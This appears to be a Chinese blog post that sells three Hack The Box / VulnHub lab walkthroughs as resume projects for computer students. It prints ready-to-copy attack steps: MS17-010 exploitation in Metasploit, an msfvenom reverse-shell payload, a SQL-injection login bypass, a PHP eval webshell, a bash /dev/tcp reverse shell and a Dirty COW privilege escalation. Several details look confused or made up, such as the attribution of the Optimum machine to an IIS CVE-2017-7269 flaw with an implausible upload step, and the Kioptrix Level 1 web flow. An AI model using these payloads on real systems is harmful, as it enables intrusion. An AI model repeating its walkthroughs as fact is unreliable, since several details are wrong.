计算机学生必看:用 HTB 靶机做网络安全实训,3 个项目写进简历秒获面试

计算机学生必看:用 HTB 靶机做网络安全实训,3 个项目写进简历秒获面试

在这里插入图片描述

很多计算机学生知道 HTB(Hack The Box)靶机适合练手,但总陷入 “瞎打靶机却没成果” 的误区 —— 练了 10 个靶机,简历上只写 “熟悉 HTB 靶场操作”,HR 根本没感觉。其实选对靶机、按 “项目化” 思路做实训,3 个 HTB 项目就能让简历脱颖而出,甚至直接获得面试邀约。

这篇针对计算机学生(大二大三为主),拆解 3 个 “难度适中、技术点明确、简历好体现” 的 HTB 实训项目,每个项目都附 “靶机选择逻辑 + 核心操作步骤 + 简历包装话术”,学过 Python/Linux 基础就能上手,做完既能掌握安全核心技能,又能给简历加 “硬亮点”。

一、项目 1:Blue(Easy 难度)—— 永恒之蓝漏洞利用实训(适合简历 “漏洞利用” 模块)

为什么选 Blue?

  • 难度匹配:Easy 级,无复杂绕路,学生 1-2 天能通关,适合首次接触漏洞利用;

  • 技术点实用:覆盖 “Nmap 扫描→漏洞识别→Metasploit 利用→权限提升” 全流程,对应企业安全岗 “应急响应” 核心能力;

  • 知名度高:HR / 技术面试官大多知道这个靶机,写进简历能快速获得认可。

实训目标:

通过永恒之蓝(MS17-010)漏洞获取 Windows Server 2008 靶机的 SYSTEM 权限,掌握 “基于已知漏洞的渗透测试” 流程。

核心操作步骤(附关键命令,可直接复用):

1. 信息收集(体现 “资产探测” 能力)

nmap -sV -p 1-1000 10.129.14.13

结果会显示 445 端口(SMB 服务)开放,且 Windows 版本为 Server 2008(永恒之蓝漏洞的易感版本)。

  • 用 smbclient 确认漏洞:

smbclient -L //10.129.14.13/ -U anonymous

发现靶机开启 SMB 匿名访问,进一步验证易感。

2. 漏洞利用(体现 “工具使用” 能力)
  • 启动 Metasploit:

msfconsole

  • 搜索永恒之蓝模块:

search ms17-010

  • 加载漏洞利用模块:

use exploit/windows/smb/ms17_010_eternalblue

  • 设置靶机 IP 和攻击载荷:

set RHOSTS 10.129.14.13

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 你的Kali IP(如10.10.14.5

  • 执行利用:

exploit

成功后会获得 meterpreter 会话(SYSTEM 权限,最高权限)。

3. 后渗透测试(体现 “深度分析” 能力)
  • 查看靶机系统信息:

sysinfo(确认系统版本、补丁情况)

  • 查找 flag 文件(HTB 靶机的 “通关凭证”):

search -f flag.txt

找到后用cat查看内容,完成通关。

简历包装话术(直接用):

“基于 HTB Blue 靶机完成永恒之蓝(MS17-010)漏洞实训:通过 Nmap 扫描识别 SMB 服务及 Windows Server 2008 系统版本,使用 Metasploit 加载漏洞利用模块,成功获取靶机 SYSTEM 权限,完成后渗透信息收集与 flag 提取,掌握已知高危漏洞的探测、利用与应急响应流程。”

二、项目 2:Optimum(Easy 难度)—— 远程代码执行(RCE)漏洞实训(适合简历 “Web 安全” 模块)

为什么选 Optimum?

  • 贴近 Web 安全岗位需求:涉及 “IIS 服务器漏洞”“远程代码执行”,是 Web 渗透测试的核心场景;

  • 技术栈适配学生:不用复杂编程,会用 Burp 抓包、Msfvenom 生成 payload 即可;

  • 能体现 “漏洞链” 思维:从 “发现漏洞” 到 “getshell” 再到 “提权”,流程完整,简历表述更丰富。

实训目标:

利用 IIS 服务器的 Remote Code Execution 漏洞(CVE-2017-7269)获取靶机权限,掌握 Web 服务漏洞的利用与权限提升方法。

核心操作步骤(附学生易上手的细节):

1. 信息收集与漏洞识别
  • Nmap 扫描发现 80 端口开放,访问靶机 IP(10.129.227.15):

看到 “Optimum 网站”,底部显示 IIS 版本为 7.5(对应 CVE-2017-7269 漏洞的易感版本)。

  • 用 Burp 抓包验证漏洞:

发送 GET 请求时,在 URL 后加/w3svc/,响应出现 “404 Not Found” 但包含 “IIS 7.5”,确认漏洞存在。

2. 生成并上传恶意 payload(体现 “payload 制作” 能力)
  • 用 Msfvenom 生成 Windows 反向连接 payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的Kali IP LPORT=4444 -f asp > shell.asp

(生成 ASP 格式的恶意文件,适配 IIS 服务器)

  • 用漏洞利用工具上传 payload:

用 “ysoserial.net” 工具(GitHub 可下载)执行命令,将shell.asp上传到靶机的C:\inetpub\wwwroot目录(Web 根目录)。

3. 监听会话与权限提升
  • 在 Metasploit 中设置监听:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 你的Kali IP

set LPORT 4444

run

  • 访问上传的 payload 触发连接:

在浏览器访问http://10.129.227.15/shell.asp,Metasploit 会获得 meterpreter 会话(初始为 iis apppool 权限)。

  • 权限提升:

用getsystem命令(meterpreter 内置提权命令),成功提升为 SYSTEM 权限,完成通关。

简历包装话术(直接用):

“基于 HTB Optimum 靶机完成 Web 服务漏洞实训:识别 IIS 7.5 服务器的 CVE-2017-7269 远程代码执行漏洞,使用 Msfvenom 生成适配 payload,通过漏洞工具上传并触发反向连接,结合 meterpreter 的 getsystem 命令完成权限提升,掌握 Web 服务漏洞的探测、利用与权限提升全流程。”

三、项目 3:VulnHub Kioptrix Level 1(Easy 难度,HTB 类似靶机)—— 综合渗透实训(适合简历 “综合能力” 模块)

为什么选这个靶机?

  • 综合场景丰富:涵盖 “SQL 注入→文件上传→命令注入→提权”,像一个 “微型企业渗透项目”;

  • 技术点全面:能同时体现 “Web 渗透” 和 “系统安全” 能力,适合想应聘 “安全工程师” 综合岗的学生;

  • 操作可复现性强:步骤清晰,学生能独立完成,容易形成完整的实训报告。

实训目标:

通过多漏洞组合利用,从 Web 端到系统端逐步突破,获取靶机 root 权限,掌握综合渗透测试的思路与方法。

核心操作步骤(突出 “流程化思维”):

1. 初始探测与 Web 入口发现

发现 80 端口(Apache 服务)和 22 端口(SSH 服务)开放,访问 80 端口看到 “Kioptrix Login” 登录页。

2. Web 层漏洞利用(体现 “漏洞链” 能力)
  • SQL 注入绕过登录

在登录页用 Burp 抓包,将username=admin’ or 1=1–&password=123代入请求,成功登录后台(体现 “SQL 注入” 能力)。

  • 文件上传漏洞 getshell

后台有 “Upload” 功能,上传含 PHP 一句话木马的文件(<?php @eval($_POST['cmd']);?>),但靶机限制 “php” 后缀,将后缀改为 “php5”(Apache 支持解析),上传成功后用蚁剑连接(体现 “文件上传绕过” 能力)。

3. 系统层权限提升(体现 “系统安全” 能力)
  • 从 Webshell 获取交互式 shell:

在蚁剑中执行bash -i >& /dev/tcp/你的Kali IP/4444 0>&1,Kali 用nc -lvp 4444监听,获得交互式 shell(初始为 www-data 权限)。

  • 查找系统漏洞提权:

执行uname -a查看系统版本为 Linux 2.6.18(存在 “Dirty COW” 脏牛漏洞,CVE-2016-5195);

从 Kali 上传脏牛漏洞 exp(GitHub 搜索 “dirtycow exploit”),编译并执行:

gcc -pthread dirtycow.c -o dirtycow -lcrypt

./dirtycow

执行后会生成新的 root 用户(用户名 firefart,密码 123456),用su firefart切换到 root 权限,完成通关。

简历包装话术(直接用):

“基于 Kioptrix 靶机完成综合渗透实训:通过 SQL 注入绕过 Web 登录、文件上传漏洞突破 Web 层、Dirty COW 漏洞实现系统提权,形成‘Web 入口→中间件突破→系统权限’的完整渗透链,独立完成从信息收集到 root 权限获取的全流程,掌握综合渗透测试的漏洞组合利用思路与应急响应方法。”

四、学生实训避坑与简历加分关键

1. 靶机选择 3 个原则(避免白练)

  • 优先选 “Easy 难度”:别一开始挑战 Hard 靶机,Easy 级能快速建立信心,且技术点明确,简历好写;

  • 选 “有公开漏洞编号” 的靶机:比如 Blue(MS17-010)、Optimum(CVE-2017-7269),写进简历能体现 “对已知漏洞的掌握”,HR 更认可;

  • 控制每个项目耗时:1-3 天完成 1 个项目,避免 “一个靶机卡一周”,效率太低。

2. 实训成果转化为简历亮点的 3 个技巧

  • 量化成果:不说 “完成靶机实训”,说 “独立完成 3 个 HTB/Easy 级靶机实训,掌握 2 类高危漏洞(永恒之蓝、RCE)的利用方法,成功获取靶机最高权限”;

  • 关联岗位需求:应聘 Web 渗透岗重点写 Optimum 项目,应聘系统安全岗重点写 Blue 项目,应聘综合岗重点写 Kioptrix 项目;

  • 附佐证材料:简历中可加 “实训报告详见 GitHub:[链接]”,报告里放关键步骤截图(如 Metasploit 获取会话、提权成功界面),HR 会觉得更真实。

3. 资源推荐(学生免费可用)

  • HTB 注册:用学校邮箱注册可免费解锁部分 Easy 靶机,无需付费;

  • 工具下载:Metasploit(Kali 自带)、Burp Suite 社区版(免费)、蚁剑(开源免费);

  • 学习参考:HTB 官方 Walkthrough(卡壳时看,别直接抄,先自己试 3 次以上)、B 站 “HTB 靶机实战” 系列教程(跟着练步骤)。

对计算机学生来说,HTB 靶机不是 “玩票性质的练习”,而是 “低成本积累项目经验” 的最佳途径。按这 3 个项目的思路做实训,简历上就能从 “会 Linux/Python” 升级为 “有网络安全实战经验”,比其他只刷算法题的同学更有竞争力 —— 去年我带的学弟用这 3 个项目写简历,秋招拿到了 3 家安全公司的面试邀约,最终入职某大厂做安全工程师。

网络安全学习资料分享

为了帮助大家更好的学习网络安全,我把我从一线互联网大厂薅来的网络安全教程及资料分享给大家,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,朋友们如果有需要这套网络安全教程+进阶学习资源包,可以扫码下方二维码限时免费领取(如遇扫码问题,可以在评论区留言领取哦)~

在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值